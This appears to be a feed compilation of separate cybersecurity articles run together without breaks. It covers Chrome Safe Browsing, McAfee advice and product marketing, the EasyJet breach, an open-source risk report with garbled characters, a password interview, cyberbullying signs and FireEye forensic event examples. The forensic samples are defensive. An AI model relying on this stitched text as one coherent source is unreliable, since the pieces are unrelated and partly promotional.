Enhanced Safe Browsing Protection now available in Chrome

Over the past few years we’ve seen threats on the web becoming increasingly sophisticated. Phishing sites rotate domains very quickly to avoid being blocked, and malware campaigns are directly targeting at-risk users. We’ve realized that to combat these most effectively, security cannot be one-size-fits-all anymore: That’s why today we are announcing Enhanced Safe Browsing protection in Chrome, a new option for users who require or want a more advanced level of security while browsing the web.

Turning on Enhanced Safe Browsing will substantially increase protection from dangerous websites and downloads. By sharing real-time data with Google Safe Browsing, Chrome can proactively protect you against dangerous sites. If you’re signed in, Chrome and other Google apps you use (Gmail, Drive, etc) will be able to provide improved protection based on a holistic view of threats you encounter on the web and attacks against your Google Account. In other words, we’re bringing the intelligence of Google’s cutting-edge security tools directly into your browser.

Over the next year, we’ll be adding even more protections to this mode, including tailored warnings for phishing sites and file downloads and cross-product alerts.

Building upon Safe Browsing

Safe Browsing’s blocklist API is an existing security protocol that protects billions of devices worldwide. Every day, Safe Browsing discovers thousands of new unsafe sites and adds them to the blocklist API that is shared with the web industry. Chrome checks the URL of each site you visit or file you download against a local list, which is updated approximately every 30 minutes. Increasingly, some sophisticated phishing sites slip through that 30-minute refresh window by switching domains very quickly.

This protocol is designed so that Google cannot determine the actual URL Chrome visited from this information, and thus by necessity the same verdict is returned regardless of the user’s situation. This means Chrome can’t adjust protection based on what kinds of threats a particular user is seeing or the type of sites they normally visit. So while the Safe Browsing blocklist API remains very powerful and will continue to protect users, we’ve been looking for ways to provide more proactive and tailored protections.

How Enhanced Safe Browsing works

When you switch to Enhanced Safe Browsing, Chrome will share additional security data directly with Google Safe Browsing to enable more accurate threat assessments. For example, Chrome will check uncommon URLs in real time to detect whether the site you are about to visit may be a phishing site. Chrome will also send a small sample of pages and suspicious downloads to help discover new threats against you and other Chrome users.

If you are signed in to Chrome, this data is temporarily linked to your Google Account. We do this so that when an attack is detected against your browser or account, Safe Browsing can tailor its protections to your situation. In this way, we can provide the most precise protection without unnecessary warnings. After a short period, Safe Browsing anonymizes this data so it is no longer connected to your account.

You can opt in to this mode by visiting Privacy and Security settings > Security > and selecting the “Enhanced protection” mode under Safe Browsing. It will be rolled out gradually in M83 on desktop platforms, with Android support coming in a future release. Enterprise administrators can control this setting via the SafeBrowsingProtectionLevel policy.

Tailored protections

Chrome’s billions of users are incredibly diverse, with a full spectrum of needs and perspectives in security and privacy. We will continue to invest in both Standard and Enhanced Safe Browsing with the goal to expand Chrome’s security offerings to cover all users.

The “Zero Day” Conundrum

In my last blog I talked about how we should define “zero day” and the many misuses which in my view muddy the waters, making it ever more difficult to address the actual problem. In case you missed that one you can read it here, or you can simply accept the premise that zero day threats are very rare.

Either way, I absolutely accept that we shouldn’t stop worrying about zero-day threats completely, but I do think we should put them into context and focus our resources accordingly. The VAST majority of malware we face is not zero day and is in fact exploiting vulnerabilities that are known about and have available patches to render them ineffective.

Focusing your resources accordingly will, of course, depends on how many resources you have and how skilled they are, so you should adapt the below list to fit your situation, but as a general rule here’s how I would prioritize things:

Application of new patches is a key part of your defense.

There are times (and places) where patching cannot be implemented immediately, but if you can patch you should do so – and do so as fast as possible.

Don’t overlook the importance of user education.

A significant proportion of malware is delivered via phishing attacks and better training would reduce the number of times these links are activated, resulting in fewer attacks that your other defenses need to identify and block (and of course fewer they can potentially miss).

Defense in depth is the only sensible approach.

As malware creators become more adept at tricking users and technology alike, putting all your eggs in one basket seems to be a more and more outdated approach. An endpoint security solution that leverages multiple methods of protection has a higher chance of being effective.

      • The fastest and least resource intensive method of catching malware is via signatures. It may sound a bit ‘last century’ and it’s true that signatures can only catch malware that has already been seen elsewhere (and you may even be thinking about that 725,000 number I mentioned in my previous blog) but keep in mind that even if this method won’t catch the very newest malware it’s still the best way to identify the other 925 million malware files in the database. Filtering out the known bad files without overtaxing your PC allows more CPU cycles for other tasks – namely, the machine learning methods in the next 2 points but even more importantly, running the applications you actually turned the PC on for!
      • Once you have filtered out a large proportion of the known bad malware, you need to think about how to protect against the small percentage for which signatures do not exist – and that brings us back to the previously mentioned machine learning. To understand more about machine learning in general try reading this blog written by one of my colleagues. But, for the purposes of this blog, and in the context of anti-malware, machine learning comes in 2 fundamental flavors; Pre-execution machine learning and Post-execution machine learning (or machine-learning-assisted behavioral analysis). The Pre-execution flavor does exactly what it says on the tin…it examines a file before it allows it to execute and tests it against a malware model. If it deems the file is statistically likely to be malware then it blocks it – critically before it is allowed to execute and therefore before it can do any damage whatsoever. Post-execution machine learning requires the file to execute and then instead of examining the static file for indications of maliciousness it watches the actual behavior of the process(es). Once this trace data is available it can be compared to a different type of model and again an estimation can be made as to whether it is likely to be malicious or not. Both variants have value and complement each other so just like you should be looking at signature and non-signature based detection so you should be looking at pre- and post-execution versions of machine learning.
      • The scenario outlined above where post-execution scanning is required (because the pre-execution scan has not identified something that is malicious and allows it to execute) is a neat segue into the value of application containment. This concept, delivered by McAfee back in 2017, is designed to minimize the damage that a malicious process can achieve even when the endpoint defenses have been deceived. This is of particular importance given the current prevalence of crypto-malware, whereby even if the behavioral analysis does identify malware running on your system it may have already deleted restore points, encrypted data and overwritten source files. Dynamic Application Containment will identify if a file has no reputation and if it doesn’t (so it is not known as either good or bad), and assuming the pre-execution scanning suggests it is safe, will allow it to execute but will contain it at the same time. This means that should it subsequently turn out to be malicious it will have been prevented from, for example, overwriting user data, modifying the registry, accessing network shares and a whole host of other things we wouldn’t want the bad guys to do.

Application Control

  • In some environments you can also consider application control as a way of ensuring that malicious code cannot take advantage of any vulnerabilities that may exist. This is a whitelist type approach that allows the IT department to predefine a set of applications and code that is allowed to execute and simply blocks everything else. Since malicious code won’t be on the whitelist it can never run, so why isn’t this the default position of every enterprise worldwide? Answer: because it tends to result in the IT department being overrun with irate users trying to get the job done and discovering that only a limited set of applications will work. One person is a lover of a different web browser, but they’re blocked from using that application. Another person has a personal device and wants to load the relevant software to connect it, but they can’t. A third person wants to use their great new presentation clicker only to find it needs its own software – and that’s not allowed. The list goes on….and the users get more irate.

Endpoint Protection

  • Some endpoint security solutions are better than others, but it is worth keeping in mind that there has never been, nor will there ever be one that is 100% perfect. No vendor can guarantee that malware or hackers will never find their way into your environment and that is why there is a burgeoning market for Endpoint Detection and Response (EDR) solutions. These solutions are designed to continually analyze and interrogate your infrastructure to detect low-level malicious activity that is going unidentified by other defense systems, and then enable you to react to those threats, isolate infected systems, remediate the damage and restore normal service as quickly as possible.

In summary, zero day threats are a pretty long way down the list of things I think companies should be focusing on addressing. That’s not to say they should be ignored, but there are easier things to fix and which are likely to have a more positive impact. My advice would be to hold off until patching is fully under control, the users know how to act as your first line of defense and you have a good quality antimalware solution (leveraging both signatures and machine learning) installed. Only then should you be turning your attention to the dangers of the ‘zero day’!

The post The “Zero Day” Conundrum appeared first on McAfee Blogs.

EasyJet hacking attack: are you affected and what should you do?

The airline has said the personal information of 9 million customers has been compromised

EasyJet revealed on Tuesday it had suffered a “highly sophisticated” cyber-attack. It comes at a time of heightened concern about a surge in online and phone scams linked to the coronavirus pandemic.

Related: EasyJet reveals cyber-attack exposed 9m customers' details

Continue reading...

Announcing Our State of Software Security: Open Source Edition Report

Today, we published a special supplement to our annual State of Software Security report that focuses exclusively on the security posture of the open source libraries found in applications. Prominent in almost every application today, open source libraries allow developers to move faster by quickly adding basic functionality. In fact, it would be nearly impossible to innovate with software without these libraries. However, lack of awareness about where and how open source libraries are being used and their risk factors is a problematic practice. This analysis, which examined 351,000 external libraries in 85,000 applications, found that open source libraries are, as expected, ubiquitous in applications, and that they do in fact contain risky code. But it also unearthed some good news about ways to keep track of and alleviate that risk. The report???s highlights include:

Open source libraries are ubiquitous, and risky

Open source libraries make up a significant portion of most applications??? code. Our research found that most JavaScript applications contain hundreds of open source libraries ??? some have over 1,000 different libraries. In addition, most languages feature the same set of core libraries. JavaScript and PHP in particular have several core libraries that are in just about every application.

Along with their prevalence comes risk. The report found that 70 percent of applications have a security flaw in an open source library on initial scan. Cross-Site Scripting is the most common vulnerability category found in open source libraries ??? present in 30 percent of libraries ??? followed by insecure deserialization (23.5 percent) and broken access control (20.3 percent).

Developers may be pulling in more libraries than they realize

This report highlights the amount of interconnected dependencies among open source libraries, and how that can be contributing to layers of hidden risk. In fact, our data reveals that most flawed libraries end up in code indirectly. Forty-seven percent of the flawed libraries in applications are transitive ??? in other words, they are not pulled in directly by developers, but are being pulled in by the first library (42 percent are pulled in directly, 12 percent are both). This means that developers are introducing much more code, and often flawed code, than they might be anticipating.

Securing these libraries is not necessarily a major undertaking

In the good news department, addressing the security flaws in these libraries is most often not a significant job. Most library-introduced flaws (nearly 75 percent) in applications can be addressed with only a minor version update. Major library upgrades are not usually required!

This data point suggests that this problem is one of discovery and tracking, not huge refactoring of code.

See below for the data highlights, and check out the full report for all the data details, plus our advice on how to use the story told by the numbers to improve your own application security program.

EasyJet reveals cyber-attack exposed 9m customers’ details

Airline apologises after credit card details of about 2,200 passengers were stolen
Q&A: are you affected and what should you do?

EasyJet has revealed that the personal information of 9 million customers was accessed in a “highly sophisticated” cyber-attack on the airline.

The company said on Tuesday that email addresses and travel details were accessed and it would contact the customers affected.

Continue reading...

Passwords are and have always been an Achilles Heel in CyberSecurity

LogMeOnce, a password identity management suite provider, has published a detailed interview with myself titled 'Passwords are and have always been an Achilles Heel in CyberSecurity'. In the Q&A I talk about Passwords Security (obviously), Threat Actors, IoT Security, Multi-Factor Authentication (MFA), Anti-Virus, Biometrics, AI, Privacy, and a bit on how I got into a career in Cybersecurity.

Quotes
“I’m afraid people will remain the weakest link in security, and the vast majority of cybercriminals go after this lowest hanging fruit. It’s the least effort for the most reward.”

"There is no silver bullet with password security, but MFA comes close, it significantly reduces the risk of account compromise"

"The built-in biometric authentication capabilities of smartphones are a significant advancement for security"

"Cybercriminals go after this lowest hanging fruit, the least effort for the most reward."

"As technology becomes more secure and more difficult to defeat, it stands to reason criminals will increasingly target people more."

"The impact of the WannaCry ransomware outbreak on NHS IT systems is a recent example of such cyberattack which threatens lives."

"Machine Learning can provide real benefits, especially in large Security Operations Centres (SOC), by helping analysts breakdown the steady stream of data into actionable intelligence, reducing workload and false-positive errors"

"When I look at new technology today, I still seek to thoroughly understand how it works, naturally thinking about the weaknesses which could be exploited, and the negative impact of such exploits on the people and businesses using the technology. I developed a kind of a ‘hacker’s eye for business’"

How to Stay Protected From Malware While Online at Home

Our everyday lives are not what they used to be three months ago. Many users have made the transition from working in an office to working from home and students have adopted distance learningBut while the world focuses on one virus sweeping the globe, criminals see an opportunity to spread other types of viruses across our networks and devices.  

As users adapt to their increased time spent at home and onlinehackers are taking advantage by spreading malware and other scams. Let’s break down some of the major malware scams affecting users today, as well as how they can stay secure.   

Remote Workers Targeted Through RDP Ports

With recent events accelerating the WFH trend, many companies have restricted employee travel and allocated more resources to enable virtual work. According to McAfee security researcher Thomas Roccia, a key component of enabling remote work and allowing employees to access internal corporate resources remotely is Remote Desktop Protocol (RDP). RDP is a Microsoft protocol that allows communication with a remote system. At a time where connectivity is more important now than ever before, it’s critical for users to be able to easily access the same tools and apps that they would in their office from their newfound remote work environmentsHowever, it’s likely that many organizations brought systems online quickly with minimal security checks in place, giving attackers the opportunity to infiltrate them with ease. Because RDP ports are often exposed to the internet,  an attacker could gain access to an entire network and consequentially, access a remote employee’s systemWhat’s more, these networks can be used as entry points for spreading malware or other malicious activities.  

Since March 2020, the McAfee Advanced Threat Research team has seen a significant increase in the number of exposed RDP ports. But what does that mean for users working remotelyBecause exposed RDP ports grant criminals access to remote systems, they are able to implement a number of malicious threats that could not only impact users working from home but also the organizations they work for. These threats include spreading spam and malware, as well as using the compromised RDP port to disguise malicious activity and compile their tools on the machine.  

Phishing Emails Spreading Malware and Ransomware

Recently, hackers have also leveraged phishing emails regarding today’s current events to lure people into engaging with malicious content and enabling threats to gain access to their systemsOnce established, that foothold can allow hackers to leverage malware to steal usernames and passwords, data, monitor user activity, capture user keystrokes, track network traffic and browser activity, and infiltrate networks and cloud services beyond the home. Criminals can also impersonate their victim to send emails from the infected devices to propagate themselves on numerous other systems. What’s more, hackers could spread ransomware that encrypts system files and refuse to decrypt them until the victim sends a ransom payment.  

Stay Secure in the New Digital Landscape

Hackers will always seek to capitalize on current events in order to spread cyber misfortune. The recent surge of remote employees and users taking to the internet in order to pass the time is no exception.  However, there are several steps users can take to facilitate a safe online environment for themselves and their families. Here’s what you can do to stay protected from malware regarding the current health emergency and similar threats: 

Secure your RDP protocol

Because RDP remains one of the most used vectors to breach into organizations and personal networksit’s important to follow best security practices. This includes using strong passwords and multi-factor authentication, patching vulnerabilities immediately, and not allowing RDP connections over the open internet. Discover more best practices on how to secure your RDP protocol in our blog on RDP security 

Beware of messages from unknown users

If you receive a text, email, social media message, or phone call from an unknown user regarding the current health emergency, it’s best to proceed with caution and avoid interacting with the message altogether.   

Go directly to the source

If you receive information from an unknown user, go directly to the source instead of clicking on links within messages or attachments. Using a tool like McAfee WebAdvisor can help users stay safe from malware and other threats while searching the web.   

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post How to Stay Protected From Malware While Online at Home appeared first on McAfee Blogs.

Good Malware Protection Doesn’t Need to Slow You Down!

Good malware protection doesn’t need to slow you down!

“Security software slows down my PC.” This is a comment that is often heard when talking about malware protection on computers and laptops. While this may be true for many security products, even including the security software that is built into the Windows operating system, this is not the case with McAfee security. As a matter of fact, independent tests since 2016 have proven that McAfee is not only good at catching malware, it’s also one of the lightest security products available today.

What is malware protection?

Security software continuously keeps an eye on all the data that comes in and goes out of your PC. It does this in order to verify that there are no security threats to your personal data, privacy and identity while you are, for example, shopping online, checking your social media or working remotely.

Because security software is always active and protecting in the background many users have the idea that malware protection necessarily slows down the performance of their PCs. This idea however is likely based on experiences from long ago as certain security products did indeed have serious impacts on the user experience.

Measuring PC Performance

To measure how much impact malware protection nowadays has on PC performance, some independent test labs include performance impact benchmarks in their security product tests. The most well-known of these test labs are AV-TEST, which is based in Germany, and Austria based AV-Comparatives. These independent labs are among the most reputable and well-known anti-malware test labs in the world.

In their tests both labs look at ~20 security brands, including McAfee, and the test results show that McAfee Total Protection is one of the lightest security products available today.

Let’s have a closer look at what AV-TEST and AV-Comparatives have to say.

AV-TEST

Every two months AV-TEST publishes the results of its on-going tests of 20 security products. As part of these tests the lab continuously evaluates the latest versions of all products using their default settings and measures the average impact of the product on computer speed in daily use.

A security product can achieve a maximum of 6 points depending on the test results. McAfee has consistently received the highest score in all performance tests since May 2018:

AV-Test PC Performance

Because of these excellent test results McAfee Total Protection was awarded the ‘2019 Performance Award’ by AV-TEST in March 2020.

Best Performance 2019AV-TEST Award

Below is what AV-TEST states about the award and about McAfee Total Protection:

Only products that make a high-performance finish in the AV-TEST labs throughout the test period of an entire year can claim this proof of absolute peak performance. With the AV-TEST Awards, a security product proves not only its technical superiority. Above all, it proves that it is documented as being the best the market currently has to offer in the fight against cyber-attacks.

With ‘Total Protection’, McAfee succeeded at fielding a top product in 2019 which was able to meet the high standards of the AV-TEST Institute. In the consumer field, McAfee receives recognition for best performance and is thus given the Best Performance 2019 Award by the AV-TEST Institute. 

With ‘Total Protection’, McAfee proves that good malware defense does not have to sacrifice system performance, says Andreas Marx, CEO of AV-TEST. Hardly any other software was able to achieve such stellar results in the category of performance in the annual test. Which is why McAfee receives the Performance Award for consumer software.

The announcement of the award can be seen on the AV-TEST website here.

AV-Comparatives

Every year in April and October AV-Comparatives publishes their Performance Test Report. For this report the lab looks at 17 security products including McAfee Total Protection and evaluates how much impact these have on PC performance.

The test lab uses low-end computers as these are most widely used and more at risk of suffering from resource consumption and thus performance impact. The tests also mimic daily usage as much as possible and focus on activities such as copying files, installing and uninstalling applications, launching applications, downloading files and browsing websites.

Based on the results on these tests the products are then evaluated and graded in award levels ranging from ADVANCED+ (the highest ranking) to STANDARD (the lowest ranking).

McAfee has achieved the ADVANCED+ ranking continuously since October 2016:

AV-Comparatives Performance Impact Scores

As a result, McAfee received the Silver Award in the category ‘Overall Performance (Low System-Impact)’ in February 2020 for demonstrating a lower impact on system performance than other products throughout 2019.

And in 2020 we are off to a good start again!

On May 8th AV-Comparatives published April 2020 Performance Test Report and McAfee Total Protection is again awarded with the highest possible rating: ADVANCED+.

With this result McAfee continues to show less impact on PC Performance than most other security products and is one of the lightest security products on the market: 

 

McAfee continues to show less impact on PC Performance than most other security products. Summary

Even though good malware protection is continuously monitoring all activity on your PC and laptop for cyber threats, this doesn’t have to mean that it also slows down the performance of your devices.

As we have seen in the test results of two of the world’s most reputable anti-malware test labs AV-TEST and AV-Comparatives, McAfee Total Protection has been achieving stellar test results in performance tests since October 2016 which also resulted in McAfee being awarded by both test labs with performance awards in 2019.

And with an excellent start in the 2020 test reports we believe that it is fair to say that good malware protection doesn’t need to slow you down and McAfee Total Protection is one of the lightest security products currently available.

 

 

The post Good Malware Protection Doesn’t Need to Slow You Down! appeared first on McAfee Blogs.

Is Your Child Being Cyberbullied? What Parents Need to Know

cyberbullying

In this season of social distancing, teens need their friends more than ever. Daily digital connection — through texting, video chat, social networks, and gaming — is critical to keeping friend groups strong. But could increased time online these days lead to an increase in cyberbullying?

While there isn’t data to answer that question definitively, it wouldn’t be surprising for parents to notice some signs of conflict surface as the months continue to creep by. And, with re-open dates for schools in limbo, it’s more important than ever to keep the family safety conversation humming.

For clarity: Allowing more screen time doesn’t mean more cyberbullying or conflict is certain to occur. However, experience has taught us that more screen time does increase the potential for digital conflict.

Social and Emotional Fallout

This unprecedented health event hasn’t been easy on anyone, but kids especially are likely to be holding onto some big emotions about it. A recent Common Sense Media study confirms that social media has been key to helping kids get through this crisis, but one in four kids surveyed feels “more lonely than usual.”

The school year with its milestones — proms, graduations, dates, parties — ended abruptly. It’s logical to assume these losses have sparked feelings of sadness, anger, frustration, and anxiety. And because online is where most kids connect with peers, these emotions can easily play out there in the form of aggressive behavior, conflict, or persistent drama.

Digital Awareness

cyberbullying

So how do you know if your child is being cyberbullied or dealing with conflict online? It isn’t always easy simply because so many kids won’t admit to being bullied. Often they believe telling an adult will make the harassment worse. They may feel ashamed or embarrassed about a regretful situation or the fact that they’re being targeted in the first place. For that reason, one of the best ways to help your child is to be aware of the time they spend online, the people they connect with, and how those digital circles impact their wellbeing.

What to Look For

The many forms of cyberbullying continue to evolve alongside the digital culture. Here are just a few ways kids bully one another.

 

  • Saying hurtful or intimidating things to someone on social media, a text, or email.
  • Making negative comments about a person’s sexuality, race, religion, handicaps, or physical features.
  • Camouflaging hurtful or threatening comments with words like “jk” (just joking).
  • Asking online friends to vote for or against another person, with Instagram polls or captions such as “Is this person hot or not?” or “Would you go out with this person?”
  • Posting or sharing with others the private photos, memes, emails, texts, or secrets without the permission of another person.
  • Intentionally posting unflattering or embarrassing photos of another person.
  • Spreading rumors or false information about another person online.
  • Making any threat to another person no matter how harmless you think it may be.

Signs of Cyberbullying

If your child is getting bullied online, there are some potential signs.

  • Anxious or upset after reading a text, frequently gets sick or nauseous, declines invitations from friends, or bows out of fun family outings.
  • Trouble sleeping or being withdrawn or moody.
  • Being protective of his or her phone, deleting or deactivating social networks
  • Sudden loss of a steady friend group or sudden complaining about once-loved friends.
  • Loss of interest in favorite sports or hobbies or a decline in grades.
  • References to suicide, loneliness, and hopelessness (when severe bullying is taking place).

Know Where They Go

Another way to understand your child’s emotional connection to his or her digital communities is to learn about their favorite platforms and monitor them. Pay specific attention to the tone of his or her social threads. And, if you see concerning comments or posts, ask your child how you can help. If your child is using risky apps such as WhatsApp or Kik, that allows people to use the app anonymously, discuss your concerns with your child. Some social networks are more conducive to cyberbullying than others.

Monitor Gaming Communities

Gaming time can skyrocket during the summer, and when games get competitive, cyberbullying can happen. Spend time with your child while he or she is gaming. Listen to the tone of the conversations and be aware of your child’s demeanor. For your child’s physical and emotional health, make every effort to set gaming limits as summer approaches.

Parenting Moves to Avoid

Bullying experts will tell you that what you don’t do if your child is getting bullied is often as important as what you do. Here’s some insight:

1) Never advise a child to ignore the bullying. 2) Never blame a child for being bullied even if he or she did something to aggravate the bullying. No one deserves to be bullied. 3) As angry as you feel that someone is bullying your child, do not encourage your child to fight back physically. 4) Don’t overreact; escalate accordingly. If you can identify the bully, consider talking with the child’s parents. 5) Don’t lead the charge. Give your child veto power over your involvement. If they say they don’t want you to get involved (unless you suspect physical danger or suicide), respect that. 6) If the bullying continues to escalate, report it, seek help from school counselors or the police if necessary. 7) Even if you are fearful, don’t take your child’s digital devices away. He or she didn’t do anything wrong.

Online Resources

A number of organizations are leading the charge against cyberbullying and have fantastic resources for families. Here are just a few: Cyberbullying Research CenterStopBullying.govStompOutBullying.orgKindCampaign.comItGetsBetter.orgNational Bullying Prevention Center. If you’d like your organization added to this list, please leave a comment.

We hope you and your family are staying healthy these days and finding some time to talk about online safety. If you need a refresher, read Part I and Part II of our Online Safety Basics series. And, if you’re looking for a fun school lesson for the day, you can always quiz your kids on any of McAfee’s Family Safety content!

The post Is Your Child Being Cyberbullied? What Parents Need to Know appeared first on McAfee Blogs.

Using Real-Time Events in Investigations

To understand what a threat actor did on a Windows system, analysts often turn to the tried and true sources of historical endpoint artifacts such as the Master File Table (MFT), registry hives, and Application Compatibility Cache (AppCompat). However, these evidence sources were not designed with detection or incident response in mind; crucial details may be omitted or cleared through anti-forensic methods. By looking at historical evidence alone, an analyst may not see the full story.

Real-time events can be thought of as forensic artifacts specifically designed for detection and incident response, implemented through Enterprise Detection and Response (EDR) solutions or enhanced logging implementations like Sysmon. During active-attacker endpoint investigations, FireEye Mandiant has found real-time events to be useful in filling in the gaps of what an attacker did. These events record different types of system activities such as process execution, file write activity, network connections, and more.

During incident response engagements, Mandiant uses FireEye Endpoint Security to track endpoint system events in real-time. This feature allows investigators to track an attacker on any system by alerting on and reviewing these real-time events. An analyst can use our solution’s built-in Audit Viewer or Redline to review real-time events.

Let’s look at some examples of Windows real-time events available on our solution and how they can be leveraged during an investigation. Let’s assume the account TEST-DOMAIN\BackupAdmin was an inactive Administrator account compromised by an attacker. Please note the examples provided in this post are based on real-time events observed during engagements but have been recreated or altered to preserve client confidentiality.

Process Execution Events

There are many historical process execution artifacts including AppCompat, AmCache, WMI CCM_RecentlyUsedApps, and more. A single artifact rarely covers all the useful details relating to a process's execution, but real-time process execution events change that. Our solution’s real-time process execution events record execution time, full process path, process identification number (PID), parent process path, parent PID, user, command line arguments, and even the process MD5 hash.

Table 1 provides an example of a real-time process execution event recorded by our solution.

Field

Example

Timestamp (UTC)

2020-03-10 16:40:58.235

Sequence Number

2879512

PID

9392

Process Path

C:\Windows\Temp\legitservice.exe

Username

TEST-DOMAIN\BackupAdmin

Parent PID

9103

Parent Process Path

C:\Windows\System32\cmd.exe

EventType

Start

ProcessCmdLine

"C:\Windows\Temp\legitservice.exe"  -b -m

Process MD5 Hash

a823bc31395539816e8e4664e884550f

Table 1: Example real-time process execution event

Based on this real-time process execution event, the process C:\Windows\System32\cmd.exe with PID 9103 executed the file C:\Windows\Temp\legitservice.exe with PID 9392 and the MD5 hash a823bc31395539816e8e4664e884550f. This new process used the command line arguments -b -m under the user context of TEST-DOMAIN\BackupAdmin.

We can compare this real-time event with what an analyst might see in other process execution artifacts. Table 2 provides an example AppCompat entry for the same executed process. Note the recorded timestamp is for the last modified time of the file, not the process start time.

Field

Example

File Last
Modified (UTC)

2020-03-07 23:48:09

File Path

C:\Windows\Temp\legitservice.exe

Executed Flag

TRUE

Table 2: Example AppCompat entry

Table 3 provides an example AmCache entry. Note the last modified time of the registry key can usually be used to determine the process start time and this artifact includes the SHA1 hash of the file.

Field

Example

Registry Key
Last Modified (UTC)

2020-03-10 16:40:58

File Path

C:\Windows\Temp\legitservice.exe

File Sha1 Hash

2b2e04ab822ef34969b7d04642bae47385be425c

Table 3: Example AmCache entry

Table 4 provides an example Windows Event Log process creation event. Note this artifact includes the PID in hexadecimal notation, details about the parent process, and even a field for where the process command line arguments should be. In this example the command line arguments are not present because they are disabled by default and Mandiant rarely sees this policy enabled by clients on investigations.

Field

Example

Write Time (UTC)

2020-03-10 16:40:58

Log

Security

Source

Microsoft Windows security

EID

4688

Message

A new process has been created.

Creator Subject:
      Security ID:             TEST-DOMAIN\BackupAdmin
      Account Name:            BackupAdmin
      Account Domain:          TEST-DOMAIN
      Logon ID:                0x6D6AD

Target Subject:
      Security ID:             NULL SID
      Account Name:            -
      Account Domain:          -
      Logon ID:                0x0

Process Information:
      New Process ID:          0x24b0
      New Process Name:        C:\Windows\Temp\legitservice.exe
      Token Elevation Type:    %%1938
      Mandatory Label:         Mandatory Label\Medium Mandatory Level
      Creator Process ID:      0x238f
      Creator Process Name:    C:\Windows\System32\cmd.exe
      Process Command Line:    

Table 4: Example Windows event log process creation event

If we combine the evidence available in AmCache with a fully detailed Windows Event Log process creation event, we could match the evidence available in the real-time event except for a small difference in file hash types.

File Write Events

An attacker may choose to modify or delete important evidence. If an attacker uses a file shredding tool like Sysinternal’s SDelete, it is unlikely the analyst will recover the original contents of the file. Our solution’s real-time file write events are incredibly useful in situations like this because they record the MD5 hash of the files written and partial contents of the file. File write events also record which process created or modified the file in question.

Table 5 provides an example of a real-time file write event recorded by our solution.

Field

Example

Timestamp (UTC)

2020-03-10 16:42:59.956

Sequence Number

2884312

PID

9392

Process Path

C:\Windows\Temp\legitservice.exe

Username

TEST-DOMAIN\BackupAdmin

Device Path

\Device\HarddiskVolume2

File Path

C:\Windows\Temp\WindowsServiceNT.log

File MD5 Hash

30a82a8a864b6407baf9955822ded8f9

Num Bytes Seen Written

8

Size

658

Writes

4

Event reason

File closed

Closed

TRUE

Base64 Encoded
Data At Lowest Offset

Q3JlYXRpbmcgJ1dpbmRvd3NTZXJ2aWNlTlQubG9nJy
Bsb2dmaWxlIDogT0sNCm1pbWlrYXR6KGNvbW1hbmQ

Text At Lowest Offset

Creating 'WindowsServiceNT.log' logfile : OK....mimikatz(command

Table 5: Example real-time file write event

Based on this real-time file write event, the malicious executable C:\Windows\Temp\legitservice.exe wrote the file C:\Windows\Temp\WindowsServiceNT.log to disk with the MD5 hash 30a82a8a864b6407baf9955822ded8f9. Since the real-time event recorded the beginning of the written file, we can determine the file likely contained Mimikatz credential harvester output which Mandiant has observed commonly starts with OK....mimikatz.

If we investigate a little later, we’ll see a process creation event for C:\Windows\Temp\taskassist.exe with the MD5 file hash 2b5cb081721b8ba454713119be062491 followed by several file write events for this process summarized in Table 6.

Timestamp

File Path

File Size

2020-03-10 16:53:42.351

C:\Windows\Temp\WindowsServiceNT.log

638

2020-03-10 16:53:42.351

C:\Windows\Temp\AAAAAAAAAAAAAAAA.AAA

638

2020-03-10 16:53:42.351

C:\Windows\Temp\BBBBBBBBBBBBBBBB.BBB

638

2020-03-10 16:53:42.351

C:\Windows\Temp\CCCCCCCCCCCCCCCC.CCC

638

 

 

2020-03-10 16:53:42.382

C:\Windows\Temp\XXXXXXXXXXXXXXXX.XXX

638

2020-03-10 16:53:42.382

C:\Windows\Temp\YYYYYYYYYYYYYYYY.YYY

638

2020-03-10 16:53:42.382

C:\Windows\Temp\ZZZZZZZZZZZZZZZZ.ZZZ

638

Table 6: Example timeline of SDelete File write events

Admittedly, this activity may seem strange at a first glance. If we do some research on the its file hash, we’ll see the process is actually SDelete masquerading as C:\Windows\Temp\taskassist.exe. As part of its secure deletion process, SDelete renames the file 26 times in a successive alphabetic manner.

Network Events

Incident responders rarely see evidence of network communication from historical evidence on an endpoint without enhanced logging. Usually, Mandiant relies on NetFlow data, network sensors with full or partial packet capture, or malware analysis to determine the command and control (C2) servers with which a malware sample can communicate. Our solution’s real-time network events record both local and remote network ports, the leveraged protocol, and the relevant process.

Table 7 provides an example of a real-time IPv4 network event recorded by our solution.

Field

Example

Timestamp (UTC)

2020-03-10 16:46:51.690

Sequence Number

2895588

PID

9392

Process + Path

C:\Windows\Temp\legitservice.exe

Username

TEST-DOMAIN\BackupAdmin

Local IP Address

10.0.0.52

Local Port

57472

Remote IP Address

10.0.0.51

Remote Port

443

Protocol

TCP

Table 7: Example real-time network connection event

Based on this real-time IPv4 network event, the malicious executable C:\Windows\Temp\legitservice.exe made an outbound TCP connection to 10.0.0.51:443.

Registry Key Events

By using historical evidence to investigate relevant timeframes and commonly abused registry keys, we can identify malicious or leveraged keys. Real-time registry key events are useful for linking processes to the modified registry keys. They can also show when an attacker deletes or renames a registry key. This is useful to an analyst because the only available timestamp recorded in the registry is the last modified time of a registry key, and this timestamp is updated if a parent key is updated.

Table 8 provides an example of a real-time registry key event recorded by our solution.

Field

Example

Timestamp (UTC)

2020-03-10 16:46:56.409

Sequence Number

2898196

PID

9392

Process + Path

C:\Windows\Temp\legitservice.exe

Username

TEST-DOMAIN\BackupAdmin

Event Type

3

Path

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
LegitWindowsService\ImagePath

Key Path

CurrentControlSet\Services\LegitWindowsService

Original Path

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\LegitWindowsService

Value Name

ImagePath

Value Type

REG_EXPAND_SZ

Base64 Encoded
Value

QwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABsAG
UAZwBpAHQAcwBlAHIAdgBpAGMAZQAuAGUAeABlAAAAAA==

Text

C:\Windows\Temp\legitservice.exe

Table 8: Example real-time registry key event

For our solution's real-time registry events, we can map the event type to the operation performed using Table 9.

Event Type Value

Operation

1

PreSetValueKey

2

PreDeleteValueKey

3

PostCreateKey, PostCreateKeyEx, PreCreateKeyEx

4

PreDeleteKey

5

PreRenameKey

Table 9: FireEye Endpoint Security real-time registry key event types

